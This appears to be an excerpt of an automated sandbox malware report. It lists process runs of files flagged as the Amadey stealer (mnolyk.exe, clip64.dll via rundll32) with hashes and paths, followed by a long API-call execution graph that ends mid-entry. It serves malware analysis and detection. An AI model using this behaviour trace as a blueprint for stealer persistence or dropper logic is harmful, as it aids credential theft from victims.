                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.410254197.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000000.409483823.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                    Target ID:28
                                                                    Start time:21:31:10
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                    Imagebase:0x12d0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:31
                                                                    Start time:21:32:01
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.519184660.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000000.518847759.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                    Target ID:35
                                                                    Start time:21:33:00
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000002.646081844.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000000.645377200.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                    Target ID:36
                                                                    Start time:21:34:00
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000024.00000000.773987737.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000024.00000002.774229388.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:26.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:27%
                                                                      Total number of Nodes:967
                                                                      Total number of Limit Nodes:42
                                                                      execution_graph 2196 11d4ad0 2204 11d3680 2196->2204 2199 11d4aee WriteFile 2201 11d4b0f 2199->2201 2202 11d4b14 2199->2202 2200 11d4ae9 2202->2201 2203 11d4b3b SendDlgItemMessageA 2202->2203 2203->2201 2205 11d3691 MsgWaitForMultipleObjects 2204->2205 2206 11d36a9 PeekMessageA 2205->2206 2207 11d36e8 2205->2207 2206->2205 2208 11d36bc 2206->2208 2207->2199 2207->2200 2208->2205 2208->2207 2209 11d36c7 DispatchMessageA 2208->2209 2210 11d36d1 PeekMessageA 2208->2210 2209->2210 2210->2208 2211 11d4cd0 2212 11d4cf4 2211->2212 2213 11d4d0b 2211->2213 2214 11d4d02 2212->2214 2215 11d4b60 FindCloseChangeNotification 2212->2215 2213->2214 2217 11d4dcb 2213->2217 2220 11d4d25 2213->2220 2268 11d6ce0 2214->2268 2215->2214 2218 11d4dd4 SetDlgItemTextA 2217->2218 2221 11d4de3 2217->2221 2218->2221 2219 11d4e95 2220->2214 2234 11d4c37 2220->2234 2221->2214 2242 11d476d 2221->2242 2224 11d4e38 2224->2214 2251 11d4980 2224->2251 2230 11d4e64 2259 11d47e0 LocalAlloc 2230->2259 2233 11d4e6f 2233->2214 2235 11d4c88 2234->2235 2236 11d4c4c DosDateTimeToFileTime 2234->2236 2235->2214 2239 11d4b60 2235->2239 2236->2235 2237 11d4c5e LocalFileTimeToFileTime 2236->2237 2237->2235 2238 11d4c70 SetFileTime 2237->2238 2238->2235 2240 11d4b76 SetFileAttributesA 2239->2240 2241 11d4b92 FindCloseChangeNotification 2239->2241 2240->2214 2241->2240 2273 11d66ae GetFileAttributesA 2242->2273 2244 11d477b 2244->2224 2245 11d47cc SetFileAttributesA 2247 11d47db 2245->2247 2247->2224 2250 11d47c2 2250->2245 2252 11d4990 2251->2252 2253 11d49a5 2252->2253 2254 11d49c2 lstrcmpA 2252->2254 2255 11d44b9 20 API calls 2253->2255 2256 11d4a0e 2254->2256 2257 11d49ba 2254->2257 2255->2257 2256->2257 2338 11d487a 2256->2338 2257->2214 2257->2230 2260 11d480f LocalAlloc 2259->2260 2261 11d47f6 2259->2261 2263 11d480b 2260->2263 2265 11d4831 2260->2265 2262 11d44b9 20 API calls 2261->2262 2262->2263 2263->2233 2266 11d44b9 20 API calls 2265->2266 2267 11d4846 LocalFree 2266->2267 2267->2263 2269 11d6ce8 2268->2269 2270 11d6ceb 2268->2270 2269->2219 2351 11d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2270->2351 2272 11d6e26 2272->2219 2274 11d4777 2273->2274 2274->2244 2274->2245 2275 11d6517 FindResourceA 2274->2275 2276 11d656b 2275->2276 2277 11d6536 LoadResource 2275->2277 2282 11d44b9 2276->2282 2277->2276 2278 11d6544 DialogBoxIndirectParamA FreeResource 2277->2278 2278->2276 2280 11d47b1 2278->2280 2280->2245 2280->2247 2280->2250 2283 11d44fe LoadStringA 2282->2283 2296 11d455a 2282->2296 2284 11d4527 2283->2284 2288 11d4562 2283->2288 2311 11d681f 2284->2311 2286 11d6ce0 4 API calls 2287 11d4689 2286->2287 2287->2280 2291 11d45c9 2288->2291 2298 11d457e 2288->2298 2289 11d4536 MessageBoxA 2289->2296 2293 11d45cd LocalAlloc 2291->2293 2294 11d4607 LocalAlloc 2291->2294 2293->2296 2300 11d45f3 2293->2300 2294->2296 2307 11d45c4 2294->2307 2296->2286 2298->2298 2299 11d4596 LocalAlloc 2298->2299 2299->2296 2302 11d45af 2299->2302 2303 11d171e _vsnprintf 2300->2303 2301 11d462d MessageBeep 2304 11d681f 10 API calls 2301->2304 2328 11d171e 2302->2328 2303->2307 2305 11d463b 2304->2305 2308 11d4645 MessageBoxA LocalFree 2305->2308 2309 11d67c9 EnumResourceLanguagesA 2305->2309 2307->2301 2308->2296 2309->2308 2312 11d6857 GetVersionExA 2311->2312 2321 11d691a 2311->2321 2315 11d687c 2312->2315 2312->2321 2313 11d6ce0 4 API calls 2314 11d452c 2313->2314 2314->2289 2322 11d67c9 2314->2322 2316 11d68a5 GetSystemMetrics 2315->2316 2315->2321 2317 11d68b5 RegOpenKeyExA 2316->2317 2316->2321 2318 11d68d6 RegQueryValueExA RegCloseKey 2317->2318 2317->2321 2319 11d690c 2318->2319 2318->2321 2332 11d66f9 2319->2332 2321->2313 2323 11d6803 2322->2323 2324 11d67e2 2322->2324 2323->2289 2336 11d6793 EnumResourceLanguagesA 2324->2336 2326 11d67f5 2326->2323 2337 11d6793 EnumResourceLanguagesA 2326->2337 2329 11d172d 2328->2329 2330 11d173d _vsnprintf 2329->2330 2331 11d175d 2329->2331 2330->2331 2331->2307 2333 11d670f 2332->2333 2334 11d6740 CharNextA 2333->2334 2335 11d674b 2333->2335 2334->2333 2335->2321 2336->2326 2337->2323 2339 11d48a2 CreateFileA 2338->2339 2341 11d48e9 2339->2341 2342 11d4908 2339->2342 2341->2342 2343 11d48ee 2341->2343 2342->2257 2346 11d490c 2343->2346 2347 11d48f5 CreateFileA 2346->2347 2349 11d4917 2346->2349 2347->2342 2348 11d4962 CharNextA 2348->2349 2349->2347 2349->2348 2350 11d4953 CreateDirectoryA 2349->2350 2350->2348 2351->2272 3128 11d3210 3129 11d328e EndDialog 3128->3129 3130 11d3227 3128->3130 3145 11d3239 3129->3145 3131 11d3235 3130->3131 3132 11d33e2 GetDesktopWindow 3130->3132 3136 11d32dd GetDlgItemTextA 3131->3136 3137 11d324c 3131->3137 3131->3145 3181 11d43d0 6 API calls 3132->3181 3146 11d32fc 3136->3146 3161 11d3366 3136->3161 3139 11d32c5 EndDialog 3137->3139 3140 11d3251 3137->3140 3138 11d341f GetDlgItem EnableWindow 3138->3145 3139->3145 3141 11d325c LoadStringA 3140->3141 3140->3145 3142 11d327b 3141->3142 3143 11d3294 3141->3143 3149 11d44b9 20 API calls 3142->3149 3166 11d4224 LoadLibraryA 3143->3166 3144 11d44b9 20 API calls 3144->3145 3148 11d3331 GetFileAttributesA 3146->3148 3146->3161 3151 11d337c 3148->3151 3152 11d333f 3148->3152 3149->3129 3154 11d658a CharPrevA 3151->3154 3155 11d44b9 20 API calls 3152->3155 3153 11d32a5 SetDlgItemTextA 3153->3142 3153->3145 3156 11d338d 3154->3156 3157 11d3351 3155->3157 3158 11d58c8 27 API calls 3156->3158 3157->3145 3159 11d335a CreateDirectoryA 3157->3159 3160 11d3394 3158->3160 3159->3151 3159->3161 3160->3161 3162 11d33a4 3160->3162 3161->3144 3163 11d33c7 EndDialog 3162->3163 3164 11d597d 34 API calls 3162->3164 3163->3145 3165 11d33c3 3164->3165 3165->3145 3165->3163 3167 11d4246 GetProcAddress 3166->3167 3168 11d43b2 3166->3168 3169 11d425d GetProcAddress 3167->3169 3170 11d43a4 FreeLibrary 3167->3170 3172 11d44b9 20 API calls 3168->3172 3169->3170 3171 11d4274 GetProcAddress 3169->3171 3170->3168 3171->3170 3173 11d428b 3171->3173 3174 11d329d 3172->3174 3175 11d4295 GetTempPathA 3173->3175 3179 11d42e1 3173->3179 3174->3145 3174->3153 3176 11d42ad 3175->3176 3176->3176 3177 11d42b4 CharPrevA 3176->3177 3178 11d42d0 CharPrevA 3177->3178 3177->3179 3178->3179 3180 11d4390 FreeLibrary 3179->3180 3180->3174 3183 11d4463 SetWindowPos 3181->3183 3184 11d6ce0 4 API calls 3183->3184 3185 11d33f1 SetWindowTextA SendDlgItemMessageA 3184->3185 3185->3138 3185->3145 3186 11d3450 3187 11d345e 3186->3187 3188 11d34d3 EndDialog 3186->3188 3190 11d349a GetDesktopWindow 3187->3190 3194 11d3465 3187->3194 3189 11d346a 3188->3189 3191 11d43d0 11 API calls 3190->3191 3192 11d34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3191->3192 3192->3189 3193 11d348c EndDialog 3193->3189 3194->3189 3194->3193 3195 11d4a50 3196 11d4a9f ReadFile 3195->3196 3198 11d4a66 3195->3198 3197 11d4abb 3196->3197 3198->3197 3199 11d4a82 memcpy 3198->3199 3199->3197 2352 11d6f40 SetUnhandledExceptionFilter 2353 11d4cc0 GlobalFree 3200 11d4200 3201 11d421e 3200->3201 3202 11d420b SendMessageA 3200->3202 3202->3201 3203 11d3100 3204 11d3111 3203->3204 3205 11d31b0 3203->3205 3207 11d3149 GetDesktopWindow 3204->3207 3210 11d311d 3204->3210 3206 11d31b9 SendDlgItemMessageA 3205->3206 3211 11d3141 3205->3211 3206->3211 3209 11d43d0 11 API calls 3207->3209 3208 11d3138 EndDialog 3208->3211 3212 11d315d 6 API calls 3209->3212 3210->3208 3210->3211 3212->3211 3213 11d4bc0 3215 11d4c05 3213->3215 3216 11d4bd7 3213->3216 3214 11d4c1b SetFilePointer 3214->3216 3215->3214 3215->3216 3217 11d30c0 3218 11d30de CallWindowProcA 3217->3218 3219 11d30ce 3217->3219 3220 11d30da 3218->3220 3219->3218 3219->3220 3221 11d63c0 3222 11d6407 3221->3222 3223 11d658a CharPrevA 3222->3223 3224 11d6415 CreateFileA 3223->3224 3225 11d6448 WriteFile 3224->3225 3226 11d643a 3224->3226 3227 11d6465 CloseHandle 3225->3227 3229 11d6ce0 4 API calls 3226->3229 3227->3226 3230 11d648f 3229->3230 3231 11d6c03 3232 11d6c1e 3231->3232 3233 11d6c17 _exit 3231->3233 3234 11d6c27 _cexit 3232->3234 3235 11d6c32 3232->3235 3233->3232 3234->3235 3236 11d7270 _except_handler4_common 3237 11d69b0 3238 11d69b5 3237->3238 3246 11d6fbe GetModuleHandleW 3238->3246 3240 11d69c1 __set_app_type __p__fmode __p__commode 3241 11d69f9 3240->3241 3242 11d6a0e 3241->3242 3243 11d6a02 __setusermatherr 3241->3243 3248 11d71ef _controlfp 3242->3248 3243->3242 3245 11d6a13 3247 11d6fcf 3246->3247 3247->3240 3248->3245 3249 11d34f0 3250 11d3504 3249->3250 3268 11d35b8 3249->3268 3251 11d35be GetDesktopWindow 3250->3251 3252 11d351b 3250->3252 3250->3268 3254 11d43d0 11 API calls 3251->3254 3255 11d354f 3252->3255 3256 11d351f 3252->3256 3253 11d3526 3258 11d35d6 3254->3258 3255->3253 3260 11d3559 ResetEvent 3255->3260 3256->3253 3259 11d352d TerminateThread EndDialog 3256->3259 3257 11d3671 EndDialog 3257->3253 3261 11d361d SetWindowTextA CreateThread 3258->3261 3262 11d35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3258->3262 3259->3253 3263 11d44b9 20 API calls 3260->3263 3261->3253 3264 11d3646 3261->3264 3262->3261 3265 11d3581 3263->3265 3266 11d44b9 20 API calls 3264->3266 3267 11d359b SetEvent 3265->3267 3269 11d358a SetEvent 3265->3269 3266->3268 3270 11d3680 4 API calls 3267->3270 3268->3253 3268->3257 3269->3253 3270->3268 3271 11d6ef0 3272 11d6f2d 3271->3272 3274 11d6f02 3271->3274 3273 11d6f27 ?terminate@ 3273->3272 3274->3272 3274->3273 3275 11d6bef _XcptFilter 2354 11d4ca0 GlobalAlloc 2355 11d6a60 2372 11d7155 2355->2372 2357 11d6a65 2358 11d6a76 GetStartupInfoW 2357->2358 2359 11d6a93 2358->2359 2360 11d6aa8 2359->2360 2361 11d6aaf Sleep 2359->2361 2362 11d6ac7 _amsg_exit 2360->2362 2364 11d6ad1 2360->2364 2361->2359 2362->2364 2363 11d6b13 _initterm 2368 11d6b2e __IsNonwritableInCurrentImage 2363->2368 2364->2363 2366 11d6af4 2364->2366 2364->2368 2365 11d6bd6 _ismbblead 2365->2368 2367 11d6c1e 2367->2366 2369 11d6c27 _cexit 2367->2369 2368->2365 2368->2367 2371 11d6bbe exit 2368->2371 2377 11d2bfb GetVersion 2368->2377 2369->2366 2371->2368 2373 11d717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2373 2374 11d717a 2372->2374 2376 11d71cd 2373->2376 2374->2373 2375 11d71e2 2374->2375 2375->2357 2376->2375 2378 11d2c0f 2377->2378 2379 11d2c50 2377->2379 2378->2379 2381 11d2c13 GetModuleHandleW 2378->2381 2394 11d2caa memset memset memset 2379->2394 2381->2379 2383 11d2c22 GetProcAddress 2381->2383 2383->2379 2391 11d2c34 2383->2391 2384 11d2c8e 2386 11d2c9e 2384->2386 2387 11d2c97 CloseHandle 2384->2387 2386->2368 2387->2386 2391->2379 2392 11d2c89 2489 11d1f90 2392->2489 2506 11d468f FindResourceA SizeofResource 2394->2506 2397 11d2d2d CreateEventA SetEvent 2398 11d468f 7 API calls 2397->2398 2400 11d2d57 2398->2400 2399 11d44b9 20 API calls 2401 11d2f06 2399->2401 2402 11d2d7d 2400->2402 2403 11d2d5b 2400->2403 2406 11d6ce0 4 API calls 2401->2406 2405 11d2e1f 2402->2405 2409 11d468f 7 API calls 2402->2409 2404 11d44b9 20 API calls 2403->2404 2407 11d2d6e 2404->2407 2511 11d5c9e 2405->2511 2410 11d2c62 2406->2410 2407->2401 2412 11d2d9f 2409->2412 2410->2384 2435 11d2f1d 2410->2435 2412->2403 2415 11d2da3 CreateMutexA 2412->2415 2413 11d2e3a 2417 11d2e43 2413->2417 2418 11d2e52 FindResourceA 2413->2418 2414 11d2e30 2414->2399 2415->2405 2416 11d2dbd GetLastError 2415->2416 2416->2405 2419 11d2dca 2416->2419 2537 11d2390 2417->2537 2420 11d2e6e 2418->2420 2421 11d2e64 LoadResource 2418->2421 2423 11d2dea 2419->2423 2424 11d2dd5 2419->2424 2420->2407 2552 11d36ee GetVersionExA 2420->2552 2421->2420 2426 11d44b9 20 API calls 2423->2426 2425 11d44b9 20 API calls 2424->2425 2427 11d2de8 2425->2427 2428 11d2dff 2426->2428 2430 11d2e04 CloseHandle 2427->2430 2428->2405 2428->2430 2430->2401 2434 11d6517 24 API calls 2434->2407 2436 11d2f6c 2435->2436 2437 11d2f3f 2435->2437 2661 11d5164 2436->2661 2438 11d2f5f 2437->2438 2641 11d51e5 2437->2641 2794 11d3a3f 2438->2794 2442 11d2f71 2445 11d3041 2442->2445 2676 11d55a0 2442->2676 2447 11d6ce0 4 API calls 2445->2447 2449 11d2c6b 2447->2449 2476 11d52b6 2449->2476 2450 11d2f86 GetSystemDirectoryA 2451 11d658a CharPrevA 2450->2451 2452 11d2fab LoadLibraryA 2451->2452 2453 11d2ff7 FreeLibrary 2452->2453 2454 11d2fc0 GetProcAddress 2452->2454 2456 11d3017 SetCurrentDirectoryA 2453->2456 2457 11d3006 2453->2457 2454->2453 2455 11d2fd6 DecryptFileA 2454->2455 2455->2453 2464 11d2ff0 2455->2464 2458 11d3054 2456->2458 2459 11d3026 2456->2459 2457->2456 2726 11d621e GetWindowsDirectoryA 2457->2726 2461 11d3061 2458->2461 2737 11d3b26 2458->2737 2463 11d44b9 20 API calls 2459->2463 2461->2445 2466 11d307a 2461->2466 2746 11d256d 2461->2746 2468 11d3037 2463->2468 2464->2453 2470 11d3098 2466->2470 2757 11d3ba2 2466->2757 2813 11d6285 GetLastError 2468->2813 2470->2445 2474 11d30af 2470->2474 2815 11d4169 2474->2815 2477 11d52d6 2476->2477 2486 11d5316 2476->2486 2480 11d5300 LocalFree LocalFree 2477->2480 2482 11d52eb SetFileAttributesA DeleteFileA 2477->2482 2478 11d5374 2479 11d538c 2478->2479 3124 11d1fe1 2478->3124 2481 11d6ce0 4 API calls 2479->2481 2480->2477 2480->2486 2483 11d2c72 2481->2483 2482->2480 2483->2384 2483->2392 2485 11d535e SetCurrentDirectoryA 2488 11d2390 13 API calls 2485->2488 2486->2478 2486->2485 2487 11d65e8 4 API calls 2486->2487 2487->2485 2488->2478 2490 11d1f9a 2489->2490 2493 11d1f9f 2489->2493 2491 11d1ea7 15 API calls 2490->2491 2491->2493 2492 11d1fc0 2495 11d1fcf ExitWindowsEx 2492->2495 2496 11d1ee2 GetCurrentProcess OpenProcessToken 2492->2496 2497 11d1fd9 2492->2497 2493->2492 2494 11d44b9 20 API calls 2493->2494 2493->2497 2494->2492 2495->2497 2499 11d1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2496->2499 2501 11d1f0e 2496->2501 2497->2384 2500 11d1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 11d1f1f 2500->2502 2503 11d44b9 20 API calls 2501->2503 2504 11d6ce0 4 API calls 2502->2504 2503->2502 2505 11d1f8c 2504->2505 2505->2384 2507 11d2d1a 2506->2507 2508 11d46b6 2506->2508 2507->2397 2507->2414 2508->2507 2509 11d46be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 11d46df memcpy_s FreeResource 2509->2510 2510->2507 2512 11d5e17 2511->2512 2535 11d5cc3 2511->2535 2514 11d6ce0 4 API calls 2512->2514 2513 11d5dd0 2513->2512 2517 11d5dec GetModuleFileNameA 2513->2517 2516 11d2e2c 2514->2516 2515 11d5ced CharNextA 2515->2535 2516->2413 2516->2414 2517->2512 2518 11d5e0a 2517->2518 2587 11d66c8 2518->2587 2520 11d6218 2596 11d6e2a 2520->2596 2523 11d5e36 CharUpperA 2524 11d61d0 2523->2524 2523->2535 2525 11d44b9 20 API calls 2524->2525 2526 11d61e7 2525->2526 2527 11d61f7 ExitProcess 2526->2527 2528 11d61f0 CloseHandle 2526->2528 2528->2527 2529 11d5f9f CharUpperA 2529->2535 2530 11d5f59 CompareStringA 2530->2535 2531 11d6003 CharUpperA 2531->2535 2532 11d5edc CharUpperA 2532->2535 2533 11d60a2 CharUpperA 2533->2535 2534 11d667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2513 2535->2515 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 11d658a 2535->2592 2538 11d24cb 2537->2538 2541 11d23b9 2537->2541 2539 11d6ce0 4 API calls 2538->2539 2540 11d24dc 2539->2540 2540->2407 2541->2538 2542 11d23e9 FindFirstFileA 2541->2542 2542->2538 2550 11d2407 2542->2550 2543 11d2479 2547 11d2488 SetFileAttributesA DeleteFileA 2543->2547 2544 11d2421 lstrcmpA 2545 11d24a9 FindNextFileA 2544->2545 2546 11d2431 lstrcmpA 2544->2546 2548 11d24bd FindClose RemoveDirectoryA 2545->2548 2545->2550 2546->2545 2546->2550 2547->2545 2548->2538 2549 11d658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2545 2550->2549 2551 11d2390 5 API calls 2550->2551 2551->2550 2556 11d3737 2552->2556 2558 11d372d 2552->2558 2553 11d44b9 20 API calls 2566 11d39fc 2553->2566 2554 11d6ce0 4 API calls 2555 11d2e92 2554->2555 2555->2401 2555->2407 2567 11d18a3 2555->2567 2556->2558 2559 11d38a4 2556->2559 2556->2566 2603 11d28e8 2556->2603 2558->2553 2558->2566 2559->2558 2560 11d39c1 MessageBeep 2559->2560 2559->2566 2561 11d681f 10 API calls 2560->2561 2562 11d39ce 2561->2562 2563 11d39d8 MessageBoxA 2562->2563 2565 11d67c9 EnumResourceLanguagesA 2562->2565 2563->2566 2565->2563 2566->2554 2568 11d19b8 2567->2568 2569 11d18d5 2567->2569 2571 11d6ce0 4 API calls 2568->2571 2632 11d17ee LoadLibraryA 2569->2632 2573 11d19d5 2571->2573 2573->2407 2573->2434 2574 11d18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 11d1900 GetTokenInformation 2574->2575 2576 11d1918 GetLastError 2575->2576 2577 11d19aa CloseHandle 2575->2577 2576->2577 2578 11d1927 LocalAlloc 2576->2578 2577->2568 2579 11d19a9 2578->2579 2580 11d1938 GetTokenInformation 2578->2580 2579->2577 2581 11d194e AllocateAndInitializeSid 2580->2581 2582 11d19a2 LocalFree 2580->2582 2581->2582 2586 11d196e 2581->2586 2582->2579 2583 11d1999 FreeSid 2583->2582 2584 11d1975 EqualSid 2585 11d198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2588 11d66d5 2587->2588 2589 11d66f3 2588->2589 2591 11d66e5 CharNextA 2588->2591 2599 11d6648 2588->2599 2589->2512 2591->2588 2593 11d659b 2592->2593 2593->2593 2594 11d65ab 2593->2594 2595 11d65b8 CharPrevA 2593->2595 2594->2535 2595->2594 2602 11d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 11d621d 2600 11d665d IsDBCSLeadByte 2599->2600 2601 11d6668 2599->2601 2600->2601 2601->2588 2602->2598 2604 11d2a62 2603->2604 2611 11d290d 2603->2611 2605 11d2a6e GlobalFree 2604->2605 2606 11d2a75 2604->2606 2605->2606 2606->2559 2608 11d2955 GlobalAlloc 2608->2604 2609 11d2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 11d2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 11d2a80 GlobalUnlock 2611->2612 2613 11d2773 2611->2613 2612->2604 2614 11d27a3 CharUpperA CharNextA CharNextA 2613->2614 2615 11d28b2 2613->2615 2616 11d27db 2614->2616 2617 11d28b7 GetSystemDirectoryA 2614->2617 2615->2617 2619 11d28a8 GetWindowsDirectoryA 2616->2619 2620 11d27e3 2616->2620 2618 11d28bf 2617->2618 2621 11d28d2 2618->2621 2622 11d658a CharPrevA 2618->2622 2619->2618 2624 11d658a CharPrevA 2620->2624 2623 11d6ce0 4 API calls 2621->2623 2622->2621 2625 11d28e2 2623->2625 2626 11d2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2618 2627 11d2837 RegQueryValueExA 2626->2627 2628 11d285c 2627->2628 2629 11d289a RegCloseKey 2627->2629 2630 11d2867 ExpandEnvironmentStringsA 2628->2630 2631 11d287a 2628->2631 2629->2618 2630->2631 2631->2629 2633 11d1826 GetProcAddress 2632->2633 2634 11d1890 2632->2634 2635 11d1889 FreeLibrary 2633->2635 2636 11d1839 AllocateAndInitializeSid 2633->2636 2637 11d6ce0 4 API calls 2634->2637 2635->2634 2636->2635 2639 11d185f FreeSid 2636->2639 2638 11d189f 2637->2638 2638->2568 2638->2574 2639->2635 2642 11d468f 7 API calls 2641->2642 2643 11d51f9 LocalAlloc 2642->2643 2644 11d522d 2643->2644 2645 11d520d 2643->2645 2646 11d468f 7 API calls 2644->2646 2647 11d44b9 20 API calls 2645->2647 2648 11d523a 2646->2648 2649 11d521e 2647->2649 2650 11d523e 2648->2650 2651 11d5262 lstrcmpA 2648->2651 2652 11d6285 GetLastError 2649->2652 2653 11d44b9 20 API calls 2650->2653 2654 11d527e 2651->2654 2655 11d5272 LocalFree 2651->2655 2660 11d5223 2652->2660 2657 11d524f LocalFree 2653->2657 2658 11d44b9 20 API calls 2654->2658 2656 11d2f4d 2655->2656 2656->2436 2656->2438 2656->2445 2657->2656 2659 11d5290 LocalFree 2658->2659 2659->2660 2660->2656 2662 11d468f 7 API calls 2661->2662 2663 11d5175 2662->2663 2664 11d517a 2663->2664 2665 11d51af 2663->2665 2666 11d44b9 20 API calls 2664->2666 2667 11d468f 7 API calls 2665->2667 2668 11d518d 2666->2668 2669 11d51c0 2667->2669 2668->2442 2828 11d6298 2669->2828 2673 11d51ce 2675 11d44b9 20 API calls 2673->2675 2674 11d51e1 2674->2442 2675->2668 2677 11d468f 7 API calls 2676->2677 2678 11d55c7 LocalAlloc 2677->2678 2679 11d55fd 2678->2679 2680 11d55db 2678->2680 2681 11d468f 7 API calls 2679->2681 2682 11d44b9 20 API calls 2680->2682 2683 11d560a 2681->2683 2684 11d55ec 2682->2684 2685 11d560e 2683->2685 2686 11d5632 lstrcmpA 2683->2686 2687 11d6285 GetLastError 2684->2687 2688 11d44b9 20 API calls 2685->2688 2689 11d564b LocalFree 2686->2689 2690 11d5645 2686->2690 2691 11d55f1 2687->2691 2693 11d561f LocalFree 2688->2693 2694 11d565b 2689->2694 2695 11d5696 2689->2695 2690->2689 2692 11d55f6 2691->2692 2698 11d6ce0 4 API calls 2692->2698 2693->2692 2702 11d5467 49 API calls 2694->2702 2696 11d589f 2695->2696 2699 11d56ae GetTempPathA 2695->2699 2697 11d6517 24 API calls 2696->2697 2697->2692 2700 11d2f7e 2698->2700 2701 11d56c3 2699->2701 2706 11d56eb 2699->2706 2700->2445 2700->2450 2840 11d5467 2701->2840 2704 11d5678 2702->2704 2704->2692 2705 11d5680 2704->2705 2708 11d44b9 20 API calls 2705->2708 2706->2692 2709 11d586c GetWindowsDirectoryA 2706->2709 2710 11d5717 GetDriveTypeA 2706->2710 2708->2691 2874 11d597d GetCurrentDirectoryA SetCurrentDirectoryA 2709->2874 2711 11d5730 GetFileAttributesA 2710->2711 2724 11d572b 2710->2724 2711->2724 2715 11d5467 49 API calls 2715->2706 2716 11d2630 21 API calls 2716->2724 2718 11d57c1 GetWindowsDirectoryA 2718->2724 2719 11d597d 34 API calls 2719->2724 2720 11d658a CharPrevA 2721 11d57e8 GetFileAttributesA 2720->2721 2722 11d57fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 11d5827 SetFileAttributesA 2723->2724 2724->2692 2724->2709 2724->2710 2724->2711 2724->2716 2724->2718 2724->2719 2724->2720 2724->2723 2725 11d5467 49 API calls 2724->2725 2870 11d6952 2724->2870 2725->2724 2727 11d6249 2726->2727 2728 11d6268 2726->2728 2729 11d44b9 20 API calls 2727->2729 2730 11d597d 34 API calls 2728->2730 2732 11d625a 2729->2732 2731 11d6277 2730->2731 2733 11d6ce0 4 API 